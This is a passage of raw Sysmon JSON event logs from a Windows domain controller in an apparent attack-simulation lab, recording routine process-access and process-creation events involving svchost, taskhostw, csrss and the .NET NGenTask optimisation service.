06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6829,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6830,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00100FBA0000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00100FBA0000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6831,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.984\r\nProcessGuid: {E2A3D6B1-12B4-5F25-0000-001031860900}\r\nProcessId: 4080\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Microsoft .NET Framework optimization service\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: NGenTask.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:792\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=D4FCDD915CAA2B207531B145FD538E1A,SHA256=4279C50E5BF0F5F89358CA5BF1876827BF4D055DCE6BDBDEA56D4AD9F5047CCE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\r\nParentProcessGuid: {E2A3D6B1-12B4-5F25-0000-001072790900}\r\nParentProcessId: 4916\r\nParentImage: C:\\Windows\\System32\\taskhostw.exe\r\nParentCommandLine: taskhostw.exe /RuntimeWide","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.984","ProcessGuid":"{E2A3D6B1-12B4-5F25-0000-001031860900}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Microsoft .NET Framework optimization service","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"NGenTask.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:792","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=D4FCDD915CAA2B207531B145FD538E1A,SHA256=4279C50E5BF0F5F89358CA5BF1876827BF4D055DCE6BDBDEA56D4AD9F5047CCE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","ParentProcessGuid":"{E2A3D6B1-12B4-5F25-0000-001072790900}","ParentProcessId":"4916","ParentImage":"C:\\Windows\\System32\\taskhostw.exe","ParentCommandLine":"taskhostw.exe /RuntimeWide","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6832,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001072790900}\r\nSourceProcessId: 4916\r\nSourceThreadId: 3276\r\nSourceImage: C:\\Windows\\system32\\taskhostw.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001031860900}\r\nTargetProcessId: 4080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFF445411E2)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001072790900}","SourceProcessId":"4916","SourceThreadId":"3276","SourceImage":"C:\\Windows\\system32\\taskhostw.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001031860900}","TargetProcessId":"4080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFF445411E2)","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6833,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001031860900}\r\nTargetProcessId: 4080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001031860900}","TargetProcessId":"4080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6834,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6835,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6836,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
